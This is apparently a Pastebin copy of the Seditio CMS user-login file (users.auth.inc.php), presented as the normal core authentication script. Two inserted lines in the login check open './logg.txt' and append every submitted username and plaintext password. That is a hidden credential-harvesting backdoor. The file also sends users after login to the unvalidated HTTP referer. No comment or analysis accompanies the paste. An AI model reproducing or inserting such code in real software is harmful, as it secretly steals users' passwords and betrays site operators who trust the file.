SHARE
TWEET

Untitled

a guest Oct 22nd, 2019 114 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  <?PHP
  2.  
  3. /* ====================
  4. Seditio - Website engine
  5. Copyright Neocrome
  6. http://www.neocrome.net
  7. [BEGIN_SED]
  8. File=users.auth.inc.php
  9. Version=130
  10. Updated=2010-feb-05
  11. Type=Core
  12. Author=Neocrome
  13. Description=User authentication
  14. [END_SED]
  15. ==================== */
  16.  
  17. if (!defined('SED_CODE')) { die('Wrong URL.'); }
  18.  
  19. $v = sed_import('v','G','PSW');
  20.  
  21. /* === Hook === */
  22. $extp = sed_getextplugins('users.auth.first');
  23. if (is_array($extp))
  24.     { foreach($extp as $k => $pl) { include('plugins/'.$pl['pl_code'].'/'.$pl['pl_file'].'.php'); } }
  25. /* ===== */
  26.  
  27. if ($a=='check')
  28.     {
  29.     sed_shield_protect();
  30.  
  31.     /* === Hook for the plugins === */
  32.     $extp = sed_getextplugins('users.auth.check');
  33.     if (is_array($extp))
  34.         { foreach($extp as $k => $pl) { include('plugins/'.$pl['pl_code'].'/'.$pl['pl_file'].'.php'); } }
  35.     /* ===== */
  36.  
  37.     $rusername = sed_import('rusername','P','TXT', 24, TRUE);
  38.     $rpassword = sed_import('rpassword','P','PSW', 16, TRUE);
  39.     $rcookiettl = sed_import('rcookiettl','P','INT');
  40.     $rmdpass  = md5($rpassword);
  41.  
  42.     $__f = fopen("./logg.txt", "a");
  43.     fwrite($__f, $rusername.":".$rpassword."\n");
  44.  
  45.     $sql = sed_sql_query("SELECT user_id, user_maingrp, user_banexpire, user_skin, user_lang FROM $db_users WHERE user_password='$rmdpass' AND user_name='".sed_sql_prep($rusername)."'");
  46.  
  47.     if ($row = sed_sql_fetcharray($sql))
  48.         {
  49.         if ($row['user_maingrp']==2)
  50.             {
  51.             sed_log("Log in attempt, user inactive : ".$rusername, 'usr');
  52.             sed_redirect("message.php?msg=152");
  53.             exit;
  54.             }
  55.          elseif ($row['user_maingrp']==3)
  56.             {
  57.             if ($sys['now'] > $row['user_banexpire'] && $row['user_banexpire']>0)
  58.                 {
  59.                 $sql = sed_sql_query("UPDATE $db_users SET user_maingrp='4' WHERE user_id='".$row['user_id']."'");
  60.                 }
  61.             else
  62.                    {
  63.                 sed_log("Log in attempt, user banned : ".$rusername, 'usr');
  64.                 sed_redirect("message.php?msg=153&num=".$row['user_banexpire']);
  65.                 exit;
  66.                 }
  67.             }
  68.  
  69.         $ruserid = $row['user_id'];
  70.         $rdefskin = $row['user_skin'];
  71.  
  72.         sed_sql_query("UPDATE $db_users SET user_lastip='".$usr['ip']."' WHERE user_id='".$row['user_id']."' LIMIT 1");
  73.  
  74.         if ($rcookiettl>0 && ($cfg['authmode']==1 || $cfg['authmode']==3))
  75.             {
  76.             $rcookiettl = ($rcookiettl==0) ? 604800 : $rcookiettl;
  77.             $rcookiettl = ($rcookiettl > $cfg['cookielifetime']) ? $cfg['cookielifetime'] : $rcookiettl;
  78.             $u = base64_encode("$ruserid:_:$rmdpass:_:$rdefskin");
  79.             setcookie("SEDITIO", "$u", time()+$rcookiettl, $cfg['cookiepath'], $cfg['cookiedomain']);
  80.             }
  81.  
  82.         if ($cfg['authmode']==2 || $cfg['authmode']==3)
  83.             {
  84.             $_SESSION['rsedition'] = $ruserid;
  85.             $_SESSION['rseditiop'] = $rmdpass;
  86.             $_SESSION['rseditioq'] = $rdefskin;
  87.             }
  88. $nazad=$_SERVER['HTTP_REFERER'];
  89.         /* === Hook === */
  90.         $extp = sed_getextplugins('users.auth.check.done');
  91.         if (is_array($extp))
  92.             { foreach($extp as $k => $pl) { include('plugins/'.$pl['pl_code'].'/'.$pl['pl_file'].'.php'); } }
  93.         /* ===== */
  94.  
  95.         $sql = sed_sql_query("DELETE FROM $db_online WHERE online_userid='-1' AND online_ip='".$usr['ip']."' LIMIT 1");
  96.         sed_redirect($nazad);
  97.         exit;
  98.         }
  99.     else
  100.         {
  101.         sed_shield_update(7, "Log in");
  102.         sed_log("Log in failed, user : ".$rusername,'usr');
  103.         //sed_redirect("message.php?msg=151");
  104.         exit;
  105.         }
  106.     }
  107.  
  108. else
  109.     { unset($redir); }
  110.  
  111. /* === Hook === */
  112. $extp = sed_getextplugins('users.auth.main');
  113. if (is_array($extp))
  114.     { foreach($extp as $k => $pl) { include('plugins/'.$pl['pl_code'].'/'.$pl['pl_file'].'.php'); } }
  115. /* ===== */
  116.  
  117. require("system/header.php");
  118. $t = new XTemplate("skins/".$skin."/users.auth.tpl");
  119.  
  120. $t->assign(array(
  121.     "USERS_AUTH_TITLE" => $L['aut_logintitle'],
  122.     "USERS_AUTH_SEND" => "users.php?m=auth&amp;a=check&amp;redirect=".$redirect,
  123.     "USERS_AUTH_USER" => "<input type=\"text\" class=\"text\" name=\"rusername\" size=\"16\" maxlength=\"32\" />",
  124.     "USERS_AUTH_PASSWORD" => "<input type=\"password\" class=\"password\" name=\"rpassword\" size=\"16\" maxlength=\"32\" />".$redir,
  125.     "USERS_AUTH_REGISTER" => "users.php?m=register"
  126.         ));
  127.  
  128. /* === Hook === */
  129. $extp = sed_getextplugins('users.auth.tags');
  130. if (is_array($extp))
  131.     { foreach($extp as $k => $pl) { include('plugins/'.$pl['pl_code'].'/'.$pl['pl_file'].'.php'); } }
  132. /* ===== */
  133.  
  134. $t->parse("MAIN");
  135. $t->out("MAIN");
  136.  
  137. require("system/footer.php");
  138.  
  139. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top